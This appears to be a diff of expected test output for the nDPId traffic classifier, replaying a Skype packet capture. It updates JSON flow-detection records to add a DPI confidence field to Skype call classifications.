 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":836,"source":"skype.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969672489,"flow_last_seen":1431969672489,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431969672489,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.144","src_port":13021,"dst_port":40034,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":836,"source":"skype.pcap","alias":"nDPId-test","flow_id":131,"flow_packet_id":1,"flow_last_seen":1431969672489,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431969672489,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0NOAAAEARZEfAqAEinTeCkDLdnGIAINainDwChxJXV87XhkbitLg+A\/cA051ANFNY"}
-00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":836,"source":"skype.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969672489,"flow_last_seen":1431969672489,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431969672489,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.144","src_port":13021,"dst_port":40034,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":836,"source":"skype.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969672489,"flow_last_seen":1431969672489,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431969672489,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.144","src_port":13021,"dst_port":40034,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":837,"source":"skype.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969672489,"flow_last_seen":1431969672489,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431969672489,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.19","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":837,"source":"skype.pcap","alias":"nDPId-test","flow_id":132,"flow_packet_id":1,"flow_last_seen":1431969672489,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"ts_msec":1431969672489,"pkt":"0NQSxnP1PBXCt3IOCABFAAA2EcMAAEAR7TnAqAEib91KEzLdnEEAItfhnD4Cb3aeHJFamREFARmu+jDLOabt8VoC3Pk="}
-00622{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":837,"source":"skype.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969672489,"flow_last_seen":1431969672489,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431969672489,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.19","src_port":13021,"dst_port":40001,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":837,"source":"skype.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969672489,"flow_last_seen":1431969672489,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431969672489,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.19","src_port":13021,"dst_port":40001,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":841,"source":"skype.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431969673443,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":50053,"dst_port":40030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":841,"source":"skype.pcap","alias":"nDPId-test","flow_id":133,"flow_packet_id":1,"flow_last_seen":1431969673443,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431969673443,"pkt":"0NQSxnP1PBXCt3IOCABFAABAbK1AAEAGNnfAqAEinTc4ksOFnF5LaK4QAAAAALAC\/\/8DvAAAAgQFtAEDAwUBAQgKPiMELQAAAAAEAgAA"}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":842,"source":"skype.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431969673443,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.153","src_port":50054,"dst_port":40005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -461,13 +461,13 @@
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":843,"source":"skype.pcap","alias":"nDPId-test","flow_id":135,"flow_packet_id":1,"flow_last_seen":1431969673443,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431969673443,"pkt":"0NQSxnP1PBXCt3IOCABFAABA3dtAAEAG4QXAqAEib91KL8OHnF60mgT1AAAAALAC\/\/9fYAAAAgQFtAEDAwUBAQgKPiMELQAAAAAEAgAA"}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":844,"source":"skype.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431969673443,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.173","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":844,"source":"skype.pcap","alias":"nDPId-test","flow_id":136,"flow_packet_id":1,"flow_last_seen":1431969673443,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431969673443,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0XMQAAEARBHrAqAEiQAQXrTLdnFEAIKzLnEACNoZuauEq3ADhWmqb7oTzdlIdyJ9N"}
-00620{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":844,"source":"skype.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431969673443,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.173","src_port":13021,"dst_port":40017,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":844,"source":"skype.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431969673443,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.173","src_port":13021,"dst_port":40017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":845,"source":"skype.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431969673443,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.153","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":845,"source":"skype.pcap","alias":"nDPId-test","flow_id":137,"flow_packet_id":1,"flow_last_seen":1431969673443,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"ts_msec":1431969673443,"pkt":"0NQSxnP1PBXCt3IOCABFAAA7lioAAEARmezAqAEinTfrmTLdnFcAJ4lunEIC66wPUwGEAyW45bIdeHP6QiT0x60Zbz70ciSKMQ=="}
-00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":845,"source":"skype.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431969673443,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.153","src_port":13021,"dst_port":40023,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":845,"source":"skype.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431969673443,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.153","src_port":13021,"dst_port":40023,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":846,"source":"skype.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969673443,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.149","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":846,"source":"skype.pcap","alias":"nDPId-test","flow_id":138,"flow_packet_id":1,"flow_last_seen":1431969673443,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"ts_msec":1431969673443,"pkt":"0NQSxnP1PBXCt3IOCABFAAA180cAAEARCDTAqAEib91NlTLdnF4AIdImnEQCEhW3FidGQ7GJtk\/GLqF7d8vgcOXTwQ=="}
-00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":846,"source":"skype.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969673443,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.149","src_port":13021,"dst_port":40030,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":846,"source":"skype.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969673443,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.149","src_port":13021,"dst_port":40030,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":847,"source":"skype.pcap","alias":"nDPId-test","flow_id":134,"flow_packet_id":2,"flow_last_seen":1431969673574,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1431969673574,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYiGdN4KZwKgBIpxFw4bvEzbne1pKoqASOJB0cwAAAgQFrAQCCApOtNyOPiMELQEDAwk="}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":848,"source":"skype.pcap","alias":"nDPId-test","flow_id":134,"flow_packet_id":3,"flow_last_seen":1431969673574,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431969673574,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0MLVAAEAGKHTAqAEinTeCmcOGnEV7Wkqi7xM26IAQECzLGgAAAQEICj4jBLBOtNyO"}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":850,"source":"skype.pcap","alias":"nDPId-test","flow_id":133,"flow_packet_id":2,"flow_last_seen":1431969673591,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1431969673591,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGsCidNziSwKgBIpxew4VPS3COS2iuEaASOJBdoQAAAgQFrAQCCApNhXEjPiMELQEDAwk="}
@@ -476,10 +476,10 @@
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":861,"source":"skype.pcap","alias":"nDPId-test","flow_id":135,"flow_packet_id":3,"flow_last_seen":1431969673741,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431969673741,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0gCZAAEAGPsfAqAEib91KL8OHnF60mgT2n9mC04AQECy+ygAAAQEICj4jBVZNhV7N"}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":872,"source":"skype.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969674456,"flow_last_seen":1431969674456,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431969674456,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":872,"source":"skype.pcap","alias":"nDPId-test","flow_id":139,"flow_packet_id":1,"flow_last_seen":1431969674456,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"ts_msec":1431969674456,"pkt":"0NQSxnP1PBXCt3IOCABFAABBxa4AAEAR02nAqAEinTeCkjLdnFoALfPInEYCTMX9D0zWqHZlar9rRJ4nLA7eV\/fFhp0UOFHwVjJRpWMfLA=="}
-00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":872,"source":"skype.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969674456,"flow_last_seen":1431969674456,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431969674456,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":40026,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":872,"source":"skype.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969674456,"flow_last_seen":1431969674456,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431969674456,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":40026,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":874,"source":"skype.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969674456,"flow_last_seen":1431969674456,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431969674456,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.143","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":874,"source":"skype.pcap","alias":"nDPId-test","flow_id":140,"flow_packet_id":1,"flow_last_seen":1431969674456,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"ts_msec":1431969674456,"pkt":"0NQSxnP1PBXCt3IOCABFAAA9FOcAAEARGqjAqAEi1cezjzLdnFYAKftynEgChXSqdM1qvdY\/tcyUx+hTJaaUvSW+LNUHctwmtBhJ"}
-00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":874,"source":"skype.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969674456,"flow_last_seen":1431969674456,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431969674456,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.143","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":874,"source":"skype.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969674456,"flow_last_seen":1431969674456,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431969674456,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.143","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":878,"source":"skype.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675055,"flow_last_seen":1431969675055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431969675055,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":50056,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":878,"source":"skype.pcap","alias":"nDPId-test","flow_id":141,"flow_packet_id":1,"flow_last_seen":1431969675055,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431969675055,"pkt":"0NQSxnP1PBXCt3IOCABFAABAteJAAEAG7UHAqAEinTc4ksOIAbsXgt4IAAAAALAC\/\/+cAgAAAgQFtAEDAwUBAQgKPiMKdQAAAAAEAgAA"}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":879,"source":"skype.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675055,"flow_last_seen":1431969675055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431969675055,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.153","src_port":50057,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -496,13 +496,13 @@
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":897,"source":"skype.pcap","alias":"nDPId-test","flow_id":144,"flow_packet_id":1,"flow_last_seen":1431969675413,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431969675413,"pkt":"0NQSxnP1PBXCt3IOCABFAABAarpAAEAGVDDAqAEib91KJsOLnE+UB73TAAAAALAC\/\/+\/fwAAAgQFtAEDAwUBAQgKPiML1gAAAAAEAgAA"}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":898,"source":"skype.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675413,"flow_last_seen":1431969675413,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969675413,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.21","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":898,"source":"skype.pcap","alias":"nDPId-test","flow_id":145,"flow_packet_id":1,"flow_last_seen":1431969675413,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"ts_msec":1431969675413,"pkt":"0NQSxnP1PBXCt3IOCABFAAA5rAwAAEAR7JDAqAEiQTffFTLdnFsAJTYGnEoCYEAkEhPrC3cXaZ2QhtIeOoxIY9w9Ekoojl8="}
-00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":898,"source":"skype.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675413,"flow_last_seen":1431969675413,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969675413,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.21","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":898,"source":"skype.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675413,"flow_last_seen":1431969675413,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969675413,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.21","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":899,"source":"skype.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675413,"flow_last_seen":1431969675413,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969675413,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.140","src_port":13021,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":899,"source":"skype.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":1,"flow_last_seen":1431969675413,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"ts_msec":1431969675413,"pkt":"0NQSxnP1PBXCt3IOCABFAAAySgUAAEARsYLAqAEib91NjDLdnEMAHpNUnEwCeUQO24lPxsdSE1aywi7G9Ehfag=="}
-00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":899,"source":"skype.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675413,"flow_last_seen":1431969675413,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969675413,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.140","src_port":13021,"dst_port":40003,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
